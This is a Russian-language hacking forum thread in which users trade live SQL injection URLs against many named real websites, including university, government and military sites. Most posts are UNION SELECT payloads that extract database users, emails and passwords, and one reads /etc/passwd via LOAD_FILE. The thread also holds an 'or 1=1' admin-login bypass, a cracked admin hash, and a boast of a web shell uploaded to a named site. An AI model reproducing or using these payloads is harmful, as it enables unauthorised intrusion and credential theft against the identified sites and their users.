printer_friendly_without.php?id= остается пустым

Я малость не понимаю, где ты взял инфу user:root. Колонка 1 вроде не принтабельна. А при запросах в колонку 2 сайт выдает ошибку.
aes...

http://www.x2studios.com/index.php?page=papers&id=-8+union+select+1,2,3,concat(user,char(58),password ),5,6,7,8+from+mysql.user
делать нехер =\

http://www.superski.ru/adm/show.php?news_id=-1056+union+select+1,2,3,4,5,6,7/* :D

http://www.daoiststudies.org/scholars.php?cmd=list&userid=-1+union+select+1,2,concat(email,char(58),password) ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+membe rs+limit+0,1/* и перебираем,пасс в чистом виде;)
то ли пофиксали, то ли временно не доступно
"Error reading database"

то ли пофиксали, то ли временно не доступно
"Error reading database"
Пробелы убираем ;)

sql inj
http://celica-toyota.info/index.php?p=gallerypic&img_id=-1+union+select+1,2,3,database(),6,7,8,9,10/*

local inc

http://celica-toyota.info/index.php?p=

http://www.xfoto.ru/foto_alone.php?p_id=-99'+union+select+1,2,concat(login,0x3a,password),4 +from+users/*

админка:
http://www.xfoto.ru/admin/
asd' or 1=1/* ... =\

Пробелы убираем ;)

вроде всё убрал... после еще раз попробую

http://www.kontec.ru/details.php?product_id=-1+union+select+1,2,3,4,5,6,7,version(),9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23/*

http://www.ledi.ru/news.php?id=-6+union+select+1,version(),3,4,5,6
=))
http://www.wsites.net.ru/index.php?id=-15+union+select+1,2,3,4,5,version(),7,8,9,10,11,12 ,13,14,15/*&page=13

www.comingsoon.net/news.php?id='

http://www.autobalt.ru/catalog/models.php?marka_id=-1+union+select+1,2,database(),4,5,6,7/*

//upd:

попутно..
скулька на сайте веб-дизайнеров, создавших вышеуказанный сайт)
http://www.eto-design.ru/catalog/?top_id=1&s_id=-1+union+select+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(ver sion(),0x78),0x78),6,7,8/*

http://www.tniad.mil.id/news.php?id=-377%20union%20select%201,2,table_name,4,5,6,7,8,9, 0,1,2,34%20from%20information_schema.tables/*

http://www.pythom.com/news.php?id=1193%20union%20select%201,2,3,4,5,6,7/*
))

kamaz
http://www.pythom.com/news.php?id=1193%20union%20select%201,user,passwor d,4,5,6,7+from+mysql.user+limit+1,2/*

http://www.pythom.com/news.php?id=1193%20union%20select%201,LOAD_FILE(ch ar(47,101,116,99,47,112,97,115,115,119,100)),3,4,5 ,6,7+from+mysql.user/*

http://www.kladionicar.com/treba_znati.php?id=-1+union+select+1,2,3,4,concat(id,char(58),username ,char(58),email),6+from+users/*
Пароли не нашёл :)

http://privet.zp.ua/place.php3?id=-1+union+select+1/*

http://www.ajsquare.com/demo/forum_demo/topic_title.php?&head_id=20&td_id=-1%20union%20select%200,1,2,3,4,concat(char(117,115 ,101,114,110,97,109,101,58),username,char(32,112,9 7,115,115,119,111,114,100,58),password),6,7,8,9,1, 1,2,2,2%20from%20members/*&page=1

http://www.voyage-luxe.ru/chapter532.html?uid=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(us er,0x3a,password),0x78),0x78),3,4,5,6,7+from+mysql .user/*
уух) долго возился..
без криптования не катит =d
логин и hash в тайтле окна)
//upd:
http://www.voyage-luxe.ru/chapter8.html?uid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat( user,0x3a,password),0x78),0x78),4,5+from+mysql.use r+limit+1,1/*

http://www.diac.ru/news/comments.php?news_id=-99+union+select+1,concat(convert(login+using+cp125 1),0x3a,convert(password+using+cp1251)),3,4,5,6,7, 8+from+clients/*&sortirovka=id


http://relaxmusic.info/news_print.php?ntpl=1&print_id=-99+union+select+1,2,table_name,4,5,6,7,8+from+INFO RMATION_SCHEMA.TABLES+limit+16,1/*

=\

Первый Альтернативный Музыкальный Телеканал
http://www.a1tv.ru/AOpenBands.php?Band=-1163+union+select+1,2,user(),4,5/*

2 n0ne
баянище =)
http://www.ecom-info.spb.ru/law/print.php?id=-26+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26/*
вот вам, убивайте себе моск. там пятая версия =)

Первый Альтернативный Музыкальный Телеканал
http://www.a1tv.ru/AOpenBands.php?Band=-1163+union+select+1,2,user(),4,5/*
сколько можно =\ уже раз 10ый наверно написали =\ :rolleyes:

Spyder, ice1k, да все в тэгах постят, по поиску не найдешь)) а листать каждый раз лениво, так что извиняйте.

2Goudini
http://www.kladionicar.com/treba_znati.php?id=-1+union+select+1,2,3,4,concat(username,char(58),pa ssword),6+from+frb_user_login/* вот пассы ток хз от чего, а вообще кажеться что пассы в таблицы users лежат в колонке sifra

Spyder, ice1k, да все в тэгах постят, по поиску не найдешь)) а листать каждый раз лениво, так что извиняйте.
и вот хоть один бы, кроме этого...:

-1163+union+select+1,2,user(),4,5/*

... 4ё-нить бы написал путнего =\

2 ice1k
самому слабо додумать дальше? =D

http://akdgs.ru/news.php?id=-6+union+select+1,Convert(version()+using+cp1251),3 ,4,5,6
Набранное вами сообщение слишком короткое. Увеличьте ваше сообщение до 2 символов.
хек?

слабо? омг лол? постить пока не буду...
а мне пох http://www.a1tv.ru/AOpenBands.php?Band=-1163+union+select+1,2,concat(memberName,char(58),p asswd),4,5+from+u19508.smf_members/*

а мне пох http://www.a1tv.ru/AOpenBands.php?Band=-1163+union+select+1,2,concat(memberName,char(58),p asswd),4,5+from+u19508.smf_members/*
Вот и правильно, я этого и ждал, чтобы кто-нить запостил нормальный вариант... - я думал этого никогда не случится :p

http://www.usug.ub.gov.mn/photo_more.php?ids=-10+union+select+1,2,3,table_name+from+information_ schema.tables+limit+1,1/*
http://www.usug.ub.gov.mn/photo_more.php?ids=-10+union+select+1,2,3,column_name+from+information _schema.columns+limit+1,1/*

пару таблиц и колонок нашел, но прав не хватает похоже.

http://www.gramota.ru/news.html?nn=-2043+union+select+1,2,user(),4,5,6/*

_-[A.M.D]HiM@S-_, а хотя не, продолжай курить ту же :D

http://ru-hosting.ru/article.php?sid=2222222289+union+select+1,2,user() ,4,5,6/* хз было или нет

первые мои скули
http://www.tmx.kiev.ua/a-news/news.php?id=-2+union+select+1,2,3,version(),user(),6,7,8/*
http://www.kpla.kz/news.php?id=-2+union+select+1,2,3,4,user(),6/
http://ru-host.ru/next.php?id=3'
нечего так и не подобрал :(

http://ru-host.ru/next.php?id=3'
нечего так и не подобрал :(

omg, посмотри чуть выше.

кусочек экзотики :D
http://top.ge/cat.php?c=-1+union+select+1,2,3,4,5,6,7,8,9,10,AES_DECRYPT(AE S_ENCRYPT(version(),0),0),12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 ,37,38,39/*
правда, таблицы подобрать не смог =\ утро...
//upd:
к mysql.user выводит "access denied for ...."

http://ru-host.ru/next.php?id=3'
просто на страничку ничего не выводится
http://ru-host.ru/next.php?id=-2+union+select+1,2/*

http://php.uni-kassel.de/hrz/db4/extern/it_db/katalog/resultabg.php?q=-1+union+select+1,2,3,4,5,6,7,8,9/*

http://www.php.com/include/groups/showInfo.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22/*

http://php.uni-kassel.de/hrz/db4/extern/it_db/katalog/resultabg.php?q=-1+union+select+1,2,3,4,5,6,7,8,9/*

http://www.php.com/include/groups/showInfo.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22/*
на php.com я выкладывал уже, вроде даже этот скрипт.

По поводу первого - немного заюзаем уязвимость :D
http://www.uni-kassel.de/~sesame/_Welcome.html
тут скрипт, кажись админский :)
пассы выдираем запросом http://php.uni-kassel.de/hrz/db4/extern/it_db/katalog/resultabg.php?q=-1+union+select+1,2,3,4,5,6,password,8,9+from+users/*
username не нужен, да и нет его в таблице имхо)

Тогда сорри, не могу же я из стольких страниц темы знать какие скули были. К тому же поиск не нашел.
без проблем, это вполне нормально..
поиск не ищет, т.к. многие в [*code] пихают запросы) но оно и к лучшему)

поиск не ищет, т.к. многие в [*code] пихают запросы) но оно и к лучшему)
я в цитаты кидаю, так ИМХО более читаемо =)
такс...
http://www.pcmg.si/index.php?id=-6+union+select+1,2,3,4,5,6
админовский логин и пароль, не удивляйтесь что лимит стоит =)
http://www.pcmg.si/index.php?id=-6+union+select+1,2,3,concat(username,char(58),pass word),5,6+from+users+limit+4,1
админка
http://www.pcmg.si/admin/
Там кликаем куда нить слева (хз чё там написано) и льём шелл.
Шелл уже залит кстати =D но ссылку не могу дать ))

http://www.smartsystemsllc.com/ru/products.php?pr_id=-99+union+select+111,222/*

O_o
по-шарить так и не смог... ничерта не грузится =\ с каналом что-то =\

вот еще
http://mk.uct.ua/?q=category&id=-1+union+select+1,2,3,4,5,6,7,version()/*

__http://www.mywindow.ru/index.php?category=-1+union+select+1,2,concat(database(),char(58),user (),char(58),version()),4,5/*

__http://www.dreamokna.ru/?sec=15&item=10000000000+union+select+1,2,3/*

__http://www.akademokna.ru/pages.php?id=-1+union+select+1,concat(database(),char(58),user() ,char(58),version())/*

http://www.rocit.ru/news/shownews.php3?id=30100+UNION+SELECT+1,USER_ID,3,4, 5,6,7,8,9,0+FROM+USER/*

PR=6
Но к сожалению без вывода

http://www.ladofon.ru/news_detail.php?news_id=69+UNION+SELECT+1,2,3,conc at(email,char(58),password),5,6,7,8+FROM+user/*

PR=4

Darg, мой тебе совет, по-крайней мере в этой теме... - если после твоего поста больше ничего не было - то просто нажимай -Edit- и добавляй новый пост в предыдущий... =\

http://www.tradeinter.ru/news.php?id=2'
http://www.tradeinter.ru/cat.php?id=77'

Не более чем раскрытие пути...
Врёте вы всё ;)
http://www.tradeinter.ru/cat.php?id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*

http://www.gametunnel.com/articles.php?id=-18+union+select+1,2,3,4,version(),6,7,8,9,10,11,12 ,13,14,15,16,17,18
http://www.allaboutjazz.com/php/musician.php?id=-57+union+select+1,2,3,4,5,6,7,8,version(),10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45, 46,47,48,49,50,51,52,53,54,55,56,57
жесть =)

_http://www.clean-up.ru/cat.php?cat_id=-1+union+select+user()/*

http://www.howiefan.com/Setlist.php?id=-21+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat( email,char(58),password),14,15,16,17,18,19,20,21+f rom+members+limit+0,1/*
на сайте делать нечего, может пароли подойдут к мылу =)
ЗЫ Поставил в 13 столбик, т.к оттуда можно копировать. 2 и 3 передаются в тайтл, копировать нельзя, но смотреть удобнее

_http://justfind.hitv.ru/listing.php?cat=-1
Интересно вот это можно расковырять?
_http://rabota.kz/candidates/vacancies.php?cat=1'
раскрытие пути и только?

_http://justfind.hitv.ru/listing.php?cat=-1
Интересно вот это можно расковырять?
нет
_http://rabota.kz/candidates/vacancies.php?cat=1'
раскрытие пути и только?
нет - не только! Почитай что ли плз "мануалы" по sql-inj... =\

_http://www.erosfera.ru/browse.php?cat=8'
Вызов мемберской функции, а мембер всего один:
_http://www.erosfera.ru/user_search.php?pflag=search :)

_http://www.erosfera.ru/user_detail.php?u=video@antichat.ru :D
_http://www.erosfera.ru/search.php?keyword=-111+union+select+1,2,3/*
P.S. Лан, херню не буду больше постить... сорри.

http://www.justechn.com/news/news.php?id=-87%20union%20select%201,2,id,4,concat(username,cha r(58),password),6,7,8%20from%20users/*

http://www.ntkernel.com/news.php?id=-35%20UNION%20SELECT%200,username,pwd%20from%20admi ns/*

__

_http://gar-ptisa.ru/show_cat2.php?grid=-1+union+select+user()/*

http://insomniacmania.com/news_default.php?id=-6/**/union/**/select/**/concat(email,char(58),password),2,3,4,5,6/**/from/**/user/*
пароли в МД5

http://www.sephiroth.it/file_detail.php?id=-1+union+select+1,2,3,4,5,6,7,8,9/*

http://referat.studentport.su/subtheme.php?id=2'

http://referat.studentport.su/subtheme.php?id=2'
http://referat.studentport.su/subtheme.php?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FR OM+INFORMATION_SCHEMA.TABLES)--
etc.. ;)

http://www.artbox.by/menu.php?id=-2+union+select+version(),2,3/*в тему про версию.

http://www.vvbohemia.com.ua/tours/?t=-1+union+select+user()/*
Смотреть тайтл

http://events.wayne.edu/view.php?view=-1+union+select+1,user(),3/*
barbdb1@cwis-1.wayne.edu

http://securities.org.ua/securities_paper/review.php?id=322&pub=-1+union+select+1,2,database(),4,5,6,7,8,9/*

перебрал все таблцы с помощью запроса
http://www.artbox.by/menu.php?id=1+and+1=2+union+select+table_name,2,3+ from+information_schema.tables+limit+1,1/*
вытягивал названия c кровью



но ничего путевого тут нет...... Я тоже многое перепробывал.

__http://www.internetsecurity.ru/arts.php?333%27%20/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10/*
__http://www.internetsecurity.ru/arts.php?333%27%20/**/union/**/select/**/1,version(),database(),4,5,6,7,8,9,user()/*

http://ul-online.ru/modules/job/vacancy.php?id=-1+union+select+1,user(),version(),4,5,6,version(), 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from +mysql.user--
Первая доведенная до конца)). надеюсь не боян

http://ul-online.ru/modules/job/vacancy.php?id=-1+union+select+1,user(),version(),4,5,6,version(), 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from +mysql.user--
http://ul-online.ru/modules/job/vacancy.php?id=-1+union+select+1,user(),version(),user,password,6, version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23+from%20+mysql.user--

http://bloggingheads.tv/video.php?id=-1+union+select+1,2,3,4,5/*

скуля на udaff.com

http://cards.udaff.com/viewcat.php?id=3+union+select+1/*

скуля на udaff.com

http://cards.udaff.com/viewcat.php?id=3+union+select+1/*
Млин, я думал его уже давно закрыли... Его ломали не раз.
Кстати http://www.astromag.ru/news.php?id=-2+union+select+1,TABLE_NAME+FROM+INFORMATION_SCHEM A.TABLES+limit+13,1/*

http://www.cirad.fr/en/actualite/communique.php?id=-1+union+select+1,2,3,4,5,6,7,8,9/*
taблицы не подбирал =\
http://www.dahab-club.ru/hotel/hotel_prev.php?id=-1+union+select+1,2,3,4,5,6/*
вроде выкладывали, не помню..
версию и т.д. с помощью де/енкрипта вывести можно

http://ul-online.ru/modules/job/vacancy.php?id=-1+union+select+1,user(),version(),4,5,6,version(), 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from +mysql.user--
Первая доведенная до конца)). надеюсь не боян

скорее гармонь)) там еще форум прикручен

_http://forum.antichat.ru/showpost.php?p=275576

не знаю было или нет ,ну вот , таблицы не смог подобрать ,у кого получится ,напишите )
http://www.pimps.ru/pimps/articles/info.php?article_id=-1072%20union%20select%201,2,3,4,5,6,7/*

__http://www.in-sports.ru/index.php?page=menu&p=-1+union+select+1,version(),3,4,5,6/*

__http://www.urka.ru/consult.php?show=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from+ phpbb_users/*

http://21vek-tmn.ru/modules.php?id=-2+union+select+1,user(),3/*
http://www.autostolica.ru/news.php?id=-2+union+select+1,2,user(),version()/*
http://iwf.ru/main/top.php?id=-2+union+select+1,2,user(),4/*
Вроде всё, перебирал что знал но нечего... Если кто, что найдет киньте в пм, или за меня слона ушастого разнесите, на 1 скули.

__http://www.in-sports.ru/index.php?page=menu&p=-1+union+select+1,version(),3,4,5,6/*

__http://www.urka.ru/consult.php?show=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from+ phpbb_users/*
http://www.urka.ru/consult.php?show=-1+union+select+1,2,3,concat(username,char(58),user _password),5,6,7,8,9,10,11,12,13+from+phpbb_users+ limit+1,1/*

admin:81dc9bdb52d04dc20036dbd8313ed055

http://www.urka.ru/consult.php?show=-1+union+select+1,2,3,concat(username,char(58),user _password),5,6,7,8,9,10,11,12,13+from+phpbb_users+ limit+1,1/*
admin:81dc9bdb52d04dc20036dbd8313ed055
81dc9bdb52d04dc20036dbd8313ed055:1234
мда :)

http://www.britfilms.tv/index.php?id=-1+union+select+1,version()/*

http://kalitee.org/infos.php?id=-229%20union%20select%201%20from%20users/*

http://www.pixiport.com/auction/profile.php?user_id=4%20UNION%20SELECT%200,1,2,3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*

http://ladmavic.la.funpic.de/abipage/index.php?public=reg_events_pub&E_ID=290&P_ID=-63%20union%20select%20user()/*

http://stat.euv-ffo.de/cgi-bin/scripts/user/user_view/user_profile.php?user_id=-4%20union%20select%201,2,3,4,5,concat(login,char(5 8),pass),7,8,9,0,1,2,3,4,5,6,7,8%20from%20login/*

http://stat.euv-ffo.de/cgi-bin/scripts/user/user_view/user_profile.php?user_id=-4%20union%20select%201,2,3,4,5,AES_DECRYPT(AES_ENC RYPT(concat(user,char(58),password),0),0),7,8,9,0, 1,2,3,4,5,6,7,8%20from%20mysql.user%20limit%201,2/*
__